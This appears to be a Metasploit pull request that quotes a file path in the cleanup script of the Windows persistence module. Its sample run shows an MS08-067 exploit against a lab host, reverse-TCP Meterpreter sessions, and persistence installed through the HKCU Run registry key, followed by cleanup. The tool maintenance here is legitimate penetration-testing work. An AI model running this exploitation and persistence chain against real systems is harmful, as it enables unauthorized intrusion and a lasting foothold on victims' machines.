### PR TITLE
Fix unquoted path in cleanup script

### DIFF
--- a/modules/exploits/windows/local/persistence.rb
+++ b/modules/exploits/windows/local/persistence.rb
@@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Local
     begin
       write_file(tempvbs, vbs)
       print_good("Persistent Script written to #{tempvbs}")
-      @clean_up_rc << "rm #{tempvbs}\n"
+      @clean_up_rc << "rm '#{tempvbs}'\n"
     rescue
       print_error("Could not write the payload on the target hosts.")
       # return nil since we could not write the file on the target host.


### PR DESCRIPTION
**Problem description:**

The supplied cleanup script for `exploit/windows/local/persistence` uses an unquoted path, and since Windows uses backslashes for its pathnames, the script fails.

**Verification steps:**
- [x] Check out the topic branch
- [x] Get a Meterpreter session
- [x] Run the persistence module
- [x] Run the cleanup script
- [x] See that it works

**Sample run:**

```
msf > use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) > set RHOST 172.16.126.128
RHOST => 172.16.126.128
msf exploit(ms08_067_netapi) > exploit 

[*] Started reverse handler on 172.16.126.1:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (770048 bytes) to 172.16.126.128
[*] Meterpreter session 1 opened (172.16.126.1:4444 -> 172.16.126.128:3351) at 2014-04-30 16:46:36 -0500

meterpreter > 
Background session 1? [y/N]  
msf exploit(ms08_067_netapi) > use exploit/windows/local/persistence 
msf exploit(persistence) > set SESSION 1
SESSION => 1
msf exploit(persistence) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(persistence) > set LHOST 172.16.126.1
LHOST => 172.16.126.1
msf exploit(persistence) > exploit 

[*] Started reverse handler on 172.16.126.1:4444 
[*] Running module against WVU-26C2C72DDEA
[+] Persistent Script written to C:\WINDOWS\TEMP\hxIbsp.vbs
[*] Executing script C:\WINDOWS\TEMP\hxIbsp.vbs
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\
[*] Cleanup Meterpreter RC File: /home/wvu/.msf4/logs/persistence/WVU-26C2C72DDEA_20140430.4715/WVU-26C2C72DDEA_20140430.4715.rc
[*] Sending stage (770048 bytes) to 172.16.126.128
[*] Meterpreter session 2 opened (172.16.126.1:4444 -> 172.16.126.128:3377) at 2014-04-30 16:47:24 -0500

meterpreter > resource /home/wvu/.msf4/logs/persistence/WVU-26C2C72DDEA_20140430.4715/WVU-26C2C72DDEA_20140430.4715.rc
[*] Reading /home/wvu/.msf4/logs/persistence/WVU-26C2C72DDEA_20140430.4715/WVU-26C2C72DDEA_20140430.4715.rc
[*] Running rm 'C:\WINDOWS\TEMP\hxIbsp.vbs'

meterpreter > 
```
